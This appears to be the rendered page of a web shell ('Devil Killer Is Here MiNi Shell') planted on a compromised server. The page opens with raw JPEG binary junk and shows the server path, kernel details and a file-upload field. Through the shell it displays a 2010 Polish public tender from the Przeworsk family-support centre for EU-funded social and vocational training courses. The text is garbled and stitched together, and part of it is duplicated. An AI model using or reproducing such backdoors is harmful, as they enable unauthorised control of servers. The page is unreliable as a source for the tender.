JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100614/166540-N-2010.html

<p class="kh_header"><b>Przeworsk: Organizacja i przeprowadzenie kursów oraz szkoleń w związku z realizacją projektu pt. Program aktywizacji społecznej w Powiecie Przeworskim, realizowanego przez   PCPR w Przeworsku na podstawie umowy zawartej z Wojewódzkim Urzędem Pracy w Rzeszowie o dofinansowanie wyżej wskazanego projektu, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII - Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez PCPR</b><br>
<b>Numer ogłoszenia: 166540 - 2010; data zamieszczenia: 14.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Krakowska 11, 37-200 Przeworsk, woj. podkarpackie, tel. 16 649 09 10, faks 16 649 09 10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.przeworsk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie kursów oraz szkoleń w związku z realizacją projektu pt. Program aktywizacji społecznej w Powiecie Przeworskim, realizowanego przez   PCPR w Przeworsku na podstawie umowy zawartej z Wojewódzkim Urzędem Pracy w Rzeszowie o dofinansowanie wyżej wskazanego projektu, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII - Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez PCPR.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest organizacja i przeprowadzenie kursów oraz szkoleń w związku z realizacją projektu pt.Program aktywizacji społecznej w Powiecie Przeworskim, realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Przeworsku na podstawie umowy zawartej z Wojewódzkim Urzędem Pracy 
w Rzeszowie o dofinansowanie wyżej wskazanego projektu, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII - Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.2 Rozwój 
i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie        w podziale na VII części.
Szczegółowy opis przedmiotu zamówienia wspólny dla wszystkich VII CZĘŚCI zamówienia.

1.W ramach organizacji i przeprowadzenia kursów oraz szkoleń przedmiot zamówienia obejmuje opracowanie autorskich programów zajęć oraz ich realizację, nadzór metodyczny i organizacyjny nad realizacją kursów i szkoleń. Wykonawca zapewni, że programy szkoleń i kursów zawodowych i ich przeprowadzenie odbędzie się zgodnie z obowiązującymi przepisami prawa.
2.Kursy i szkolenia Wykonawca zrealizuje dla wskazanej liczby Uczestników Projektu, we wskazanej liczbie godzin dydaktycznych (1 godz = 45 min.) oraz we wskazanym przez Zamawiającego miejscu, zgodnie 
z ustalonym przez Zamawiającego programem szkoleń.
3.Szkolenia i kursy mają zakończyć się oceną zdobytych umiejętności oraz wydaniem stosownych dokumentów: certyfikatu, dyplomu lub zaświadczenia o ukończeniu szkolenia zgodnie z obowiązującymi w tym zakresie przepisami (Rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych Dz. U. z 2006r. Nr 31, poz. 216 ).
4.Zajęcia szkoleniowe mają odbywać się od poniedziałku do piątku. Maksymalna ilość godzin dydaktycznych 
8 godzin dziennie- zapis ten nie dotyczy CZĘŚCI I zamówienia.
5.Wykonawca zapewnia: sale szkoleniowe, specjalistyczny sprzęt dydaktyczny, materiały szkoleniowe dla uczestników. 
6. Wykonawca zapewnia warunki zgodnie z przepisami BHP.
7. Wykonawca zapewnia wyżywienie: obiad składający się z 2 dań, serwis kawowy, na który składa się: kawa, herbata, woda mineralna, suche ciasteczka.
8.Wykonawca pokrywa koszty ubezpieczenia uczestników  od następstw nieszczęśliwych wypadków NW (podczas szkolenia, w drodze na szkolenie i ze szkolenia).
9. Zamawiający zastrzega sobie możliwość prowadzenia bieżącego nadzoru nad procesem szkolenia uczestników na każdym jego etapie.
10.Wykonawca dokona wpisu o szkoleniach i kursach oraz związanych z nim szczegółach na stronie www.inwestycjawkadry.info.pl w terminie przewidzianym w umowie z Zamawiającym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstąpił od wnoszenia wadium przez Wykonawców zgodnie z art. 45 ust. 2 ustawy z dnia 29 stycznia 2004r. Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku dokonana zostanie przez Zamawiającego w oparciu o oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - zgodnie z Zał. Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej dwie usługi szkoleniowe o podobnym przedmiocie zamówienia o wartości 40.000 zł brutto (słownie: czterdzieści tysięcy złotych 00/100) każda, oraz załączy dokumenty potwierdzające, że usługi te zostały wykonane należycie, w przypadku ubiegania się o każdą z części zamówienia, zgodnie z Zał. Nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca przedstawi w wykazie stanowiącym Zał. Nr 5 do SIWZ, iż dysponuje osobą, która będzie uczestniczyć w przygotowaniu i prowadzeniu zamówienia, posiadającą doświadczenie 
w postaci zrealizowania co najmniej jednego szkolenia zgodnego z przedmiotem zamówienia, z uwzględnieniem Części  zamówienia, na które ubiegający się składa ofertę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawca zobowiązany jest do załączenia do oferty programu szkoleń, osobno dla każdej części zamówienia zgodnie z Zał. Nr 7 do SIWZ w zakresie umożliwiającym skonfrontowanie danych z wymogami określonymi w niniejszej specyfikacji.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust 1 pkt 1-4 ustawy Pzp wg wzoru zgodnie z Zał. Nr 2 do SIWZ.
2.Formularz Oferty sporządzony zgodnie z Zał. Nr 1 do SIWZ; 
3.Formularz cenowy sporządzony zgodnie z Zał. Nr 1.1 do SIWZ;
4. Parafowany projekt umowy Zał. Nr 8 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr.przeworsk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Przeworsku 
ul. Krakowska 11 
37-200 Przeworsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2010 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Przeworsku 
ul. Krakowska 11 
37-200 Przeworsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII - Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.2 Rozwój   i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Trening kompetencji społecznych dla I grupy - w formie wyjazdowej (instrument aktywizacji społecznej)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program warsztatów powinien zawierać m.in. zagadnienia z zakresu: komunikacja interpersonalna; powstawanie konfliktów i sposoby ich rozwiązywania; asertywność w życiu i pracy zawodowej, wzmacnianie poczucia własnej wartości, umiejętności społeczne.
Miejsce szkolenia: Ośrodek Szkoleniowy w maksymalnej odległości do 150 km od siedziby zamawiającego.
Forma przeprowadzonych szkoleń: warsztaty, ćwiczenia.
Usługa szkoleniowa obejmuje 3 dni szkoleniowe.
Liczba osób biorących udział w treningu: 10 wychowanków rodzin zastępczych i placówek opiekuńczo - wychowawczych (młodzież w wieku 18 -25 lat).
Liczba certyfikatów: 10.
Liczba godzin dydaktycznych: 20 h.
Liczba osób biorących udział w całym założeniu: 11, w tym 10 uczestników szkolenia i 1 pracownik socjalny, zatrudniony w projekcie.
Realizacja: w terminie16.08.- 20.08.2010r. w układzie 3 dni (20 h), szkolenie wyjazdowe.
Dodatkowe zadania Wykonawcy:
Zapewnienie atrakcyjnego ośrodka szkoleniowego, o standardzie co najmniej 2 - gwiazdkowym, 
z zakwaterowaniem i wyżywieniem oraz salami dydaktycznymi - maksymalna odległość 150 km od siedziby zamawiającego. Zakwaterowanie z zapleczem socjalnym i sanitarnym dla 11 osób, w tym 1 opiekun grupy, 7 kobiet i 3 mężczyzn. Pokoje z łazienkami w układzie: 1 pokój - 1 osobowy, pozostałe 2 lub 3 i 4 osobowe. 
Zapewnienie wyżywienia: I dzień szkolenia - obiad, serwis kawowy, kolacja; II dzień szkolenia: śniadanie, serwis kawowy, obiad, serwis kawowy, kolacja; III dzień szkolenia: śniadanie, serwis kawowy, obiad. Na serwis kawowy składa się: kawa, herbata, woda mineralna, suche ciasteczka. Wykonawca poniesie koszty opłaty klimatycznej oraz zapewni przejazd wszystkich uczestników (bus) na trasie Przeworsk - miejsce szkolenia - Przeworsk..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Trening pracy w formie stacjonarnej dla II grup (instrument aktywizacji społecznej)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program warsztatów powinien zawierać m.in. zagadnienia z zakresu: rynek pracy, wartości płynące z posiadania pracy, rozwój zawodowy, plusy i minusy bezrobocia, bilans posiadanych zasobów - określenie mocnych i słabych stron, sprecyzowanie zainteresowań; umiejętności i metody poszukiwania pracy, analiza ofert i ogłoszeń o pracę; przygotowanie i opracowanie podstawowych dokumentów aplikacyjnych - życiorys zawodowy CV, list motywacyjny, podanie o pracę; prezentacja, przygotowanie do rozmów kwalifikacyjnych, błędy popełniane w trakcie spotkań  z pracodawcą i ich unikanie.Miejsce szkolenia: Przeworsk.
Forma przeprowadzonych szkoleń: warsztaty, ćwiczenia.
Usługa szkoleniowa obejmuje 2 cykle szkoleń po 3 dni szkoleniowe dla każdej z II grup, łącznie 6 dni.
Liczba grup szkoleniowych: II grupy, w tym I grupa 10 - osobowa, II grupa 20 - osobowa.
Liczba osób biorących udział w warsztatach: 30 osób.
Liczba certyfikatów: 30.
Liczba godzin dydaktycznych: 20 h dla każdej grupy szkoleniowej, łącznie 40 h.
Liczba osób biorących udział w całym założeniu: 30, w tym: 10 wychowanków rodzin zastępczych i placówek opiekuńczo - wychowawczych - młodzież w wieku 18 - 25 lat (I grupa) i 20 osób niepełnosprawnych, kobiety w wieku 20 - 50 lat i mężczyźni do 55 r.ż. (II grupa).
Realizacja:
- w okresie 23.08. - 27.08.2010r. w układzie 3 dni (20 h), szkolenie stacjonarne I grupa - 10 osobowa.
- w okresie 01.11.- 15.11. 2010r. w układzie 3 dni (20 h), szkolenie stacjonarne II grupa - 20 osobowa,
Dodatkowe zadania Wykonawcy:
Zwrot kosztów przejazdu wszystkich uczestników kursu z: miejsce zamieszkania - miejsce szkolenia - miejsce zamieszkania wg zasad przewidzianych dla Programu Operacyjnego Kapitał Ludzki.Miejsce szkolenia: Przeworsk.
Forma przeprowadzonych szkoleń: warsztaty, ćwiczenia.
Usługa szkoleniowa obejmuje 2 cykle szkoleń po 3 dni szkoleniowe dla każdej z II grup, łącznie 6 dni.
Liczba grup szkoleniowych: II grupy, w tym I grupa 10 - osobowa, II grupa 20 - osobowa.
Liczba osób biorących udział w warsztatach: 30 osób.
Liczba certyfikatów: 30.
Liczba godzin dydaktycznych: 20 h dla każdej grupy szkoleniowej, łącznie 40 h.
Liczba osób biorących udział w całym założeniu: 30, w tym: 10 wychowanków rodzin zastępczych i placówek opiekuńczo - wychowawczych - młodzież w wieku 18 - 25 lat (I grupa) i 20 osób niepełnosprawnych, kobiety w wieku 20 - 50 lat i mężczyźni do 55 r.ż. (II grupa).
Realizacja:
- w okresie 23.08. - 27.08.2010r. w układzie 3 dni (20 h), szkolenie stacjonarne I grupa - 10 osobowa.
- w okresie 01.11.- 15.11. 2010r. w układzie 3 dni (20 h), szkolenie stacjonarne II grupa - 20 osobowa,
Dodatkowe zadania Wykonawcy:
Zwrot kosztów przejazdu wszystkich uczestników kursu z: miejsce zamieszkania - miejsce szkolenia - miejsce zamieszkania wg zasad przewidzianych dla Programu Operacyjnego Kapitał Ludzki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs przygotowania zawodowego - kelner - barman (instrument aktywizacji edukacyjnej)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program szkolenia musi zawierać m.in. zagadnienia z zakresu przygotowania sali konsumpcyjnej do obsługi kelnerskiej oraz bufetu do pracy, kompleksowej obsługi konsumenta na sali konsumpcyjnej i przy barze, obsługiwania uczestników przyjęć okolicznościowych, udzielania konsumentowi informacji dotyczących potraw i napojów, doradzania konsumentowi w zakresie wyboru potraw i napojów, sporządzania i wykańczania potraw w obecności konsumenta, sporządzania napojów mieszanych bezalkoholowych i alkoholowych, przygotowywania naczyń oraz szkła, obsługiwania uczestników przyjęć okolicznościowych, układania karty menu oraz win i wódek, posługiwania się maszynami, urządzeniami i drobnym sprzętem, niezbędnym przy wykonywaniu czynności zawodowych z zastosowaniem zasad bhp i p.poż. w pracy, dokonywania rozliczeń materiałowych, technologicznych i finansowych.
Celem szkolenia jest przygotowanie uczestników do wykonywania zawodu: kelner -barman.
